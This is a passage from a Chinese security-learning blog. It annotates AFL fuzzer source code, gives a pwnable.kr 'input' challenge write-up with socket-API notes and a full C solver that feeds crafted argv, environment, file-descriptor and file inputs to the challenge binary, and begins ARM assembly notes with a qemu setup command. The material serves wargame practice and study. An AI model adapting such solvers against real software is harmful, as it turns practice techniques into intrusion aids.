class="line"></span><br><span class="line">  prev_timed_out = child_timed_out;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/*Report outcome to caller. 下面都是判断测试用例退出类型*/</span></span><br><span class="line">  <span class="keyword">if</span> (WIFSIGNALED(status) &amp;&amp; !stop_soon) &#123;</span><br><span class="line">    kill_signal = WTERMSIG(status);</span><br><span class="line">    <span class="keyword">if</span> (child_timed_out &amp;&amp; kill_signal == SIGKILL) <span class="keyword">return</span> FAULT_TMOUT;</span><br><span class="line">    <span class="keyword">return</span> FAULT_CRASH;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* A somewhat nasty hack for MSAN, which doesn't support abort_on_error and</span></span><br><span class="line"><span class="comment">     must use a special exit code. */</span></span><br><span class="line">  <span class="keyword">if</span> (uses_asan &amp;&amp; WEXITSTATUS(status) == MSAN_ERROR)</span><br><span class="line">  &#123;</span><br><span class="line">    kill_signal = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">return</span> FAULT_CRASH;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> FAULT_NONE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="main-part2"><a href="#main-part2" class="headerlink" title="main(part2)"></a>main(part2)</h3><p>fuzzer的第二部分，部分删减，虽然说前面分析跑测试用例的部分已经把fuzzer原理缕了很多，但是这里开始才是变异的核心部分，有些可以参考sakura的<a href="https://www.anquanke.com/post/id/213432" target="_blank" rel="noopener">这篇文章</a>，可能写的更详细或者侧重点不同啥的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line">  cull_queue();<span class="comment">//用于精简提供的测试用例，算法在文章最开始提到的文章里面有写，是一个贪心策略，这里面的标记都是用的单个bit，用到了前面的minibitmap</span></span><br><span class="line">  show_init_stats();</span><br><span class="line">  seek_to = find_start_position();<span class="comment">//resume时用，正常状态为0</span></span><br><span class="line"></span><br><span class="line">  write_stats_file(<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">  save_auto();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (stop_soon) <span class="keyword">goto</span> stop_fuzzing;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">    u8 skipped_fuzz;</span><br><span class="line">    cull_queue();</span><br><span class="line">    <span class="keyword">if</span> (!queue_cur) &#123;<span class="comment">//queue_cur用来判断是否执行完一轮，当然初始进来的时候应该是默认为null</span></span><br><span class="line">      queue_cycle++;<span class="comment">//整个队列循环的次数</span></span><br><span class="line">      current_entry     = <span class="number">0</span>;<span class="comment">//这个好像就是指第几个测试用例</span></span><br><span class="line">      cur_skipped_paths = <span class="number">0</span>;<span class="comment">//</span></span><br><span class="line">      queue_cur         = <span class="built_in">queue</span>;</span><br><span class="line">        </span><br><span class="line">      show_stats();</span><br><span class="line">      <span class="comment">/* If we had a full queue cycle with no new finds, try</span></span><br><span class="line"><span class="comment">         recombination strategies next. */</span></span><br><span class="line">      <span class="keyword">if</span> (queued_paths == prev_queued) <span class="comment">//queue里的case数是否未变化</span></span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> (use_splicing) cycles_wo_finds++; <span class="comment">//开启拼接时cycles_wo_finds++</span></span><br><span class="line">        <span class="keyword">else</span> use_splicing = <span class="number">1</span>;<span class="comment">//否则开启拼接</span></span><br><span class="line">      &#125; </span><br><span class="line">      <span class="keyword">else</span> cycles_wo_finds = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">      prev_queued = queued_paths;</span><br><span class="line">      <span class="keyword">if</span> (sync_id &amp;&amp; queue_cycle == <span class="number">1</span> &amp;&amp; getenv(<span class="string">"AFL_IMPORT_FIRST"</span>))<span class="comment">//这里是synchronize fuzz用的</span></span><br><span class="line">        sync_fuzzers(use_argv);</span><br><span class="line">    &#125;</span><br><span class="line">    skipped_fuzz = fuzz_one(use_argv);<span class="comment">//关键函数，fuzz_one对当前queue进行一次完整测试，也是目前最长的一个函数，大约有1500行</span></span><br><span class="line">      </span><br><span class="line">    <span class="keyword">if</span> (!stop_soon &amp;&amp; sync_id &amp;&amp; !skipped_fuzz) &#123;</span><br><span class="line">      <span class="keyword">if</span> (!(sync_interval_cnt++ % SYNC_INTERVAL))</span><br><span class="line">        sync_fuzzers(use_argv);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!stop_soon &amp;&amp; exit_1) stop_soon = <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">if</span> (stop_soon) <span class="keyword">break</span>;</span><br><span class="line">    queue_cur = queue_cur-&gt;next;</span><br><span class="line">    current_entry++;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (queue_cur) show_stats();</span><br><span class="line">  write_bitmap();</span><br><span class="line">  write_stats_file(<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">  save_auto();</span><br><span class="line"></span><br><span class="line">stop_fuzzing:</span><br><span class="line">  SAYF(CURSOR_SHOW cLRD <span class="string">"\n\n+++ Testing aborted %s +++\n"</span> cRST,</span><br><span class="line">       stop_soon == <span class="number">2</span> ? <span class="string">"programmatically"</span> : <span class="string">"by user"</span>);</span><br><span class="line">  <span class="comment">/* Running for more than 30 minutes but still doing first cycle? */</span></span><br><span class="line">  <span class="keyword">if</span> (queue_cycle == <span class="number">1</span> &amp;&amp; get_cur_time() - start_time &gt; <span class="number">30</span> * <span class="number">60</span> * <span class="number">1000</span>) &#123;</span><br><span class="line">    SAYF(<span class="string">"\n"</span> cYEL <span class="string">"[!] "</span> cRST</span><br><span class="line">           <span class="string">"Stopped during the first cycle, results may be incomplete.\n"</span></span><br><span class="line">           <span class="string">"    (For info on resuming, see %s/README.)\n"</span>, doc_path);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  fclose(plot_file);</span><br><span class="line">  destroy_queue();</span><br><span class="line">  destroy_extras();</span><br><span class="line">  ck_free(target_path);</span><br><span class="line">  ck_free(sync_id);</span><br><span class="line">  alloc_report();</span><br><span class="line">  OKF(<span class="string">"We're done here. Have a nice day!\n"</span>);</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br></pre></td></tr></table></figure>

<h3 id="fuzz-one"><a href="#fuzz-one" class="headerlink" title="fuzz_one"></a>fuzz_one</h3><p>先看一下他的跳过策略</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (pending_favored) </span><br><span class="line">&#123;</span><br><span class="line">       <span class="comment">/* If we have any favored, non-fuzzed new arrivals in the queue,</span></span><br><span class="line"><span class="comment">          possibly skip to them at the expense of already-fuzzed or non-favored</span></span><br><span class="line"><span class="comment">          cases. */</span></span><br><span class="line">       <span class="keyword">if</span> ((queue_cur-&gt;was_fuzzed || !queue_cur-&gt;favored) &amp;&amp; UR(<span class="number">100</span>) &lt; SKIP_TO_NEW_PROB) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    	<span class="comment">//这里不满足favored或者non-fuzzed的话跳过概率是99%</span></span><br><span class="line"> &#125; </span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (!dumb_mode &amp;&amp; !queue_cur-&gt;favored &amp;&amp; queued_paths &gt; <span class="number">10</span>) </span><br><span class="line"> &#123;</span><br><span class="line">       <span class="comment">/* Otherwise, still possibly skip non-favored cases, albeit less often.</span></span><br><span class="line"><span class="comment">          The odds of skipping stuff are higher for already-fuzzed inputs and</span></span><br><span class="line"><span class="comment">          lower for never-fuzzed entries. */</span></span><br><span class="line">       <span class="keyword">if</span> (queue_cycle &gt; <span class="number">1</span> &amp;&amp; !queue_cur-&gt;was_fuzzed) </span><br><span class="line">       &#123;</span><br><span class="line">             <span class="keyword">if</span> (UR(<span class="number">100</span>) &lt; SKIP_NFAV_NEW_PROB) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">             <span class="comment">//queue_cycle大于1且没有被fuzz过，跳过概率是75%</span></span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">else</span> </span><br><span class="line">       &#123;</span><br><span class="line">             <span class="keyword">if</span> (UR(<span class="number">100</span>) &lt; SKIP_NFAV_OLD_PROB) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">             <span class="comment">//fuzzed&amp;&amp;no-favored，有90%概率跳过</span></span><br><span class="line">       &#125;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>

<p>进入fuzz流程的话，就先将case map到内存</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fd = <span class="built_in">open</span>(queue_cur-&gt;fname, O_RDONLY);</span><br><span class="line">len = queue_cur-&gt;len;</span><br><span class="line">orig_in = in_buf = mmap(<span class="number">0</span>, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, <span class="number">0</span>);<span class="comment">//MAP_PRIVATE在内存对文件的修改不会影响文件本身</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">close</span>(fd);</span><br></pre></td></tr></table></figure>

<p>然后有一个<code>CALIBRATION</code>阶段和<code>TRIMMING</code>阶段，前者是在之前<code>proform_dry_run</code>中如果校准失败就再次校准，后者主要是为了修剪文件长度啥的，如果修剪文件对执行路径没有影响就<code>make it permanent</code>，优化后续运行</p>
<p>之后是一个<code>PERFORMANCE SCORE</code>阶段为该case计分，影响后续的havoc stage</p>
<p>到这里就是主要的变异策略了，推荐<a href="https://paper.seebug.org/496/#part-2afl" target="_blank" rel="noopener">直接看文章吧</a>，后面节约时间我就先不写了，以后自己要写变异策略的时候再参考吧</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/01/11/pwnable-kr%E2%80%94%E2%80%94input-leg/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2021/01/11/pwnable-kr%E2%80%94%E2%80%94input-leg/" class="post-title-link" itemprop="url">pwnable.kr——input+leg</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-01-11 19:00:00" itemprop="dateCreated datePublished" datetime="2021-01-11T19:00:00+08:00">2021-01-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-03-19 18:25:21" itemprop="dateModified" datetime="2021-03-19T18:25:21+08:00">2021-03-19</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/01/11/pwnable-kr%E2%80%94%E2%80%94input-leg/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/01/11/pwnable-kr%E2%80%94%E2%80%94input-leg/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="pwnable-kr-——-input"><a href="#pwnable-kr-——-input" class="headerlink" title="pwnable.kr —— input"></a>pwnable.kr —— input</h1><p>先看看题目代码</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210103152433405.png" alt="image-20210103152433405" style="zoom:80%;">

<h2 id="stage1"><a href="#stage1" class="headerlink" title="stage1"></a>stage1</h2><p>要求argc值为100，就是除文件名外还需要99个参数，<code>argv[&#39;A&#39;]=&quot;\x00&quot;</code>，<code>argv[&#39;B&#39;]=&quot;\x20\x0a\x0d&quot;</code>，要满足最后<code>argv[argc]=NULL</code></p>
<h2 id="stage2"><a href="#stage2" class="headerlink" title="stage2"></a>stage2</h2><p>要求从fd:0（stdin）处读出4字节<code>\x00\x0a\x00\xff</code>，从fd:2（stderr）处读出四字节<code>\x00\x0a\x02\xff</code>，这里直接读是读不了的，要使用dup2函数将文件描述符克隆到 0和2 </p>
<h2 id="stage3"><a href="#stage3" class="headerlink" title="stage3"></a>stage3</h2><p>设置一个环境变量，好说</p>
<h2 id="stage4"><a href="#stage4" class="headerlink" title="stage4"></a>stage4</h2><p>打开一个文件名是回车的文件，读四字节<code>\x00\x00\x00\x00</code></p>
<h2 id="stage5"><a href="#stage5" class="headerlink" title="stage5"></a>stage5</h2><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210103153255873.png" alt="image-20210103153255873" style="zoom:80%;">

<p>这里好好学一下网络编程的一些东西，之前一直喜欢忽略</p>
<h3 id="socket函数（返回socke描述符）"><a href="#socket函数（返回socke描述符）" class="headerlink" title="socket函数（返回socke描述符）"></a>socket函数（返回socke描述符）</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">socket</span><span class="params">(<span class="keyword">int</span> family,<span class="keyword">int</span> type,<span class="keyword">int</span> protocol)</span></span>;</span><br><span class="line"><span class="comment">//返回：若成功则为非负描述符，若出错则为-1</span></span><br></pre></td></tr></table></figure>

<p>family参数指明协议簇，决定了socket的地址类型，如AF_INET决定了要用IPv4地址(32位的)与端口号(16位的)的组合、AF_UNIX要使用一个绝对路径名作为地址</p>
<table>
<thead>
<tr>
<th>family</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>AF_INET (一般用)</td>
<td>IPv4协议</td>
</tr>
<tr>
<td>AF_INET6</td>
<td>IPv6协议</td>
</tr>
<tr>
<td>AF_LOCAL</td>
<td>Unix域协议</td>
</tr>
<tr>
<td>AF_ROUTE</td>
<td>路由套接字</td>
</tr>
<tr>
<td>AF_KEY</td>
<td>密钥套接字</td>
</tr>
</tbody></table>
<p>type参数指明socket类型</p>
<table>
<thead>
<tr>
<th>type</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>SOCK_STREAM</td>
<td>字节流套接字</td>
</tr>
<tr>
<td>SOCK_DGRAM</td>
<td>数据报套接字</td>
</tr>
<tr>
<td>SOCK_SEGPACKET</td>
<td>有序分组套接字</td>
</tr>
<tr>
<td>SOCK_RAW</td>
<td>原始套接字</td>
</tr>
</tbody></table>
<p>protocol指协议，一般赋值0让系统自动选择</p>
<p>（这三个参数更详细的内容可以在<a href="https://binhack.readthedocs.io/zh/latest/os/linux/syscall/socket.html" target="_blank" rel="noopener">这里</a>找到）</p>
<h3 id="sockaddr-in结构体"><a href="#sockaddr-in结构体" class="headerlink" title="sockaddr_in结构体"></a>sockaddr_in结构体</h3><p>用来设置具体地址给bind函数当做参数，因为一些字节序的原因不直接使用sockaddr，但两者目的等价；设置好协议簇之后，IP地址的sin_addr.s_addr可以用INADDR_ANY表示本机，也可以用具体的IP地址，如<code>inet_addr(&quot;192.168.1.1&quot;)</code>；然后端口号使用<code>hton()</code>封装，转换字节序</p>
<p><strong>这里题目的意思就是将我们<code>argv[&#39;C&#39;]</code>处的值作为绑定的端口号</strong></p>
<h3 id="bind、listen、accept、recv"><a href="#bind、listen、accept、recv" class="headerlink" title="bind、listen、accept、recv"></a>bind、listen、accept、recv</h3><p>设置好结构体后此程序作为服务端程序，bind对应端口，然后监听，listen函数的第一个参数即为监听的socket描述字，第二个参数为相应socket可以排队的最大连接个数。socket()函数创建的socket默认是一个主动类型的，listen函数将socket变为被动类型的，等待客户的连接请求。</p>
<p>这里accept返回的是新的已连接的socket描述字，和前面的监听socket描述字不一样，监听socket描述字一直存在，而当服务器完成某服务后已连接的socket描述字就会被关闭</p>
<p>之后使用recv接受四字节内容</p>
<p>更加具体的描述可以看<a href="http://images.cnblogs.com/cnblogs_com/skynet/201012/201012122157467258.png" target="_blank" rel="noopener">这篇文章</a>，同时这里还有一张图表示建立连接与TCP三次握手的关系</p>
<img src="http://images.cnblogs.com/cnblogs_com/skynet/201012/201012122157467258.png">



<h2 id="solution"><a href="#solution" class="headerlink" title="solution"></a>solution</h2><p>直接上代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> *P=<span class="string">"/home/pwner/Desktop/pwnable.kr/input2/input"</span>;<span class="comment">//写题时换成pwnable.kr那边的路径</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">char</span> *Argv[<span class="number">101</span>];</span><br><span class="line">    <span class="keyword">char</span> *Envp[<span class="number">2</span>];</span><br><span class="line">    <span class="comment">//argv</span></span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">100</span>;i++)Argv[i]=<span class="string">"\x20"</span>;</span><br><span class="line">    Argv[<span class="string">'A'</span>]=<span class="string">"\x00"</span>;</span><br><span class="line">    Argv[<span class="string">'B'</span>]=<span class="string">"\x20\x0a\x0d"</span>;</span><br><span class="line">    Argv[<span class="number">100</span>]=<span class="literal">NULL</span>;<span class="comment">//设置参数</span></span><br><span class="line">    <span class="comment">//env</span></span><br><span class="line">    Envp[<span class="number">0</span>]=<span class="string">"\xde\xad\xbe\xef=\xca\xfe\xba\xbe"</span>;</span><br><span class="line">    Envp[<span class="number">1</span>]=<span class="literal">NULL</span>;<span class="comment">//设置环境变量</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">int</span> fd1=<span class="built_in">open</span>(<span class="string">"./infile"</span> ,  O_CREAT | O_RDWR , S_IRWXU | S_IRWXO | S_IRWXG);</span><br><span class="line">    <span class="keyword">int</span> fd2=<span class="built_in">open</span>(<span class="string">"./errfile"</span>,  O_CREAT | O_RDWR , S_IRWXU | S_IRWXO | S_IRWXG);</span><br><span class="line">    <span class="comment">//这里创建两个文件打开后用于将0,2文件描述符覆盖</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">write</span>(fd1,<span class="string">"\x00\x0a\x00\xff"</span>,<span class="number">4</span>);</span><br><span class="line">    <span class="built_in">write</span>(fd2,<span class="string">"\x00\x0a\x02\xff"</span>,<span class="number">4</span>);</span><br><span class="line"></span><br><span class="line">    dup2(fd1,<span class="number">0</span>);</span><br><span class="line">    dup2(fd2,<span class="number">2</span>);</span><br><span class="line">    lseek(fd1,<span class="number">0</span>,SEEK_SET);<span class="comment">//写文件之后要调用lseek将文件指针重置一下</span></span><br><span class="line">    lseek(fd2,<span class="number">0</span>,SEEK_SET);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(fd1);<span class="built_in">close</span>(fd2);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">int</span> fd3=<span class="built_in">open</span>(<span class="string">"./\x0a"</span>,  O_CREAT | O_RDWR , S_IRWXU | S_IRWXO | S_IRWXG);<span class="comment">//这里创建需要的“回车”文件</span></span><br><span class="line">    <span class="built_in">write</span>(fd3,<span class="string">"\x00\x00\x00\x00"</span>,<span class="number">4</span>);</span><br><span class="line">    <span class="built_in">close</span>(fd3);</span><br><span class="line"></span><br><span class="line">    Argv[<span class="string">'C'</span>]=<span class="string">"8888"</span>;</span><br><span class="line"></span><br><span class="line">    execve(P,Argv,Envp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后我解题的具体做法是进入pwnable服务器之后，cd /tmp ，mkdir ljc ，cd ljc ，touch solu.c , vim solu.c</p>
<p>然后把这段代码写进去，修改一下可执行文件的路径保存，再 ln -s flag /home/input2/flag 为了最后一步cat flag，gcc编译之后运行，此时就会等待stage5，再从一个新的命令行用python输入就行</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210104202957472.png" alt="image-20210104202957472" style="zoom: 67%;">

<h1 id="pwnable-kr-——-leg"><a href="#pwnable-kr-——-leg" class="headerlink" title="pwnable.kr —— leg"></a>pwnable.kr —— leg</h1><p>一道ARM汇编的题目，来入门一下arm的汇编</p>
<h2 id="ARM学习"><a href="#ARM学习" class="headerlink" title="ARM学习"></a>ARM学习</h2><p><a href="https://azeria-labs.com/writing-arm-assembly-part-1/" target="_blank" rel="noopener">从这个教程开始</a></p>
<p>搭环境我创了一个全新的ubuntu 20 虚拟机…装了大概一天的各种依赖等等，把python2装上去了，还有什么re2c，Ninja，meson，编译安装了一个qemu，东西还挺多的，然后又琢磨了一晚上qemu树莓派虚拟机的网络问题….照着<a href="https://wiki.qemu.org/Features/HelperNetworking" target="_blank" rel="noopener">这里</a>（这里的helper最后还是没用，琢磨了一个下午也没琢磨出来。。tcl）还是用<a href="https://azeria-labs.com/emulate-raspberry-pi-with-qemu/" target="_blank" rel="noopener">教程的指导</a>把树莓派虚拟机网络问题解决了，我起qemu的命令是这样的</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">stty intr ^]</span><br><span class="line">qemu-system-arm -kernel /home/coldshield/qemu_vms/kernel-qemu-4.4.34-jessie \</span><br><span class="line">		-cpu arm1176 \</span><br><span class="line">		-m 256 \</span><br><span class="line">		-M versatilepb \</span><br><span class="line">		-serial stdio \</span><br><span class="line">		-net nic \</span><br><span class="line">		-nic tap,ifname=tap0,script=no,downscript=no\</span><br><span class="line">		-append <span class="string">"root=/dev/sda2 rootfstype=ext4 rw console=ttyAMA0,115200"</span> \</span><br><span class="line">		-hda /home/coldshield/qemu_vms/2017-03-02-raspbian-jessie.img \</span><br><span class="line">		-no-reboot</span><br></pre></td></tr></table></figure>

<p>进去之后我是设置静态DNS还有网络，然后让虚拟机和host还有外网都能ping通，（参照过<a href="https://blog.csdn.net/mculover666/article/details/105664454" target="_blank" rel="noopener">这里</a>，后来自己又谷歌了一下静态配置，用了一个静态的IP还有DNS连上我的tap），然后因为镜像的磁盘空间不够又给手动扩了个容….参照<a href="https://yushulx.medium.com/how-to-resize-raspbian-image-for-qemu-on-windows-ac0b44075d8f" target="_blank" rel="noopener">这里</a>。还有树莓派虚拟机里面的gdb只能支持python2的gef，那个教程没更新了吧可能，用<a href="https://github.com/hugsy/gef-legacy" target="_blank" rel="noopener">gef-legacy</a>就行，反正全部弄清楚是啥然后搭起来断断续续搞了两三天的样子….</p>
<p>随手记一些教程上的东西，可能会特别粗略</p>
<h3 id="常见访存指令-amp-后缀"><a href="#常见访存指令-amp-后缀" class="headerlink" title="常见访存指令&amp;后缀"></a>常见访存指令&amp;后缀</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ldr &#x3D; Load Word</span><br><span class="line">ldrh &#x3D; Load unsigned Half Word</span><br><span class="line">ldrsh &#x3D; Load signed Half Word</span><br><span class="line">ldrb &#x3D; Load unsigned Byte</span><br><span class="line">ldrsb &#x3D; Load signed Bytes</span><br><span class="line"></span><br><span class="line">str &#x3D; Store Word</span><br><span class="line">strh &#x3D; Store unsigned Half Word</span><br><span class="line">strsh &#x3D; Store signed Half Word</span><br><span class="line">strb &#x3D; Store unsigned Byte</span><br><span class="line">strsb &#x3D; Store signed Byte</span><br></pre></td></tr></table></figure>

<h3 id="一些寄存器"><a href="#一些寄存器" class="headerlink" title="一些寄存器"></a>一些寄存器</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">R0	–	 General purpose</span><br><span class="line">R1	–	 General purpose</span><br><span class="line">R2	–	 General purpose</span><br><span class="line">R3	–	 General purpose</span><br><span class="line">R4	–	 General purpose</span><br><span class="line">R5	–	 General purpose</span><br><span class="line">R6	–	 General purpose</span><br><span class="line">R7	–	Holds Syscall Number  系统调用号</span><br><span class="line">R8	–	 General purpose</span><br><span class="line">R9	–	 General purpose</span><br><span class="line">R10	–	 General purpose</span><br><span class="line">R11	FP	Frame Pointer         类似EBP</span><br><span class="line">R12	IP	Intra Procedural Call </span><br><span class="line">R13	SP	Stack Pointer         类似ESP,以字节为单位</span><br><span class="line">R14	LR	Link Register         函数返回时存放返回地址</span><br><span class="line">R15	PC	Program Counter       类似EIP，但实际内容不是存放next的地址，而是存放当前执行指令+2指令的地址（ARM模式值+8，Thumb模式值+4，这里应该是跟指令流水线有关？）</span><br><span class="line">CPSR	–	Current Program Status Register</span><br><span class="line"></span><br><span class="line">函数调用时前四个参数存在 r0-r3</span><br></pre></td></tr></table></figure>

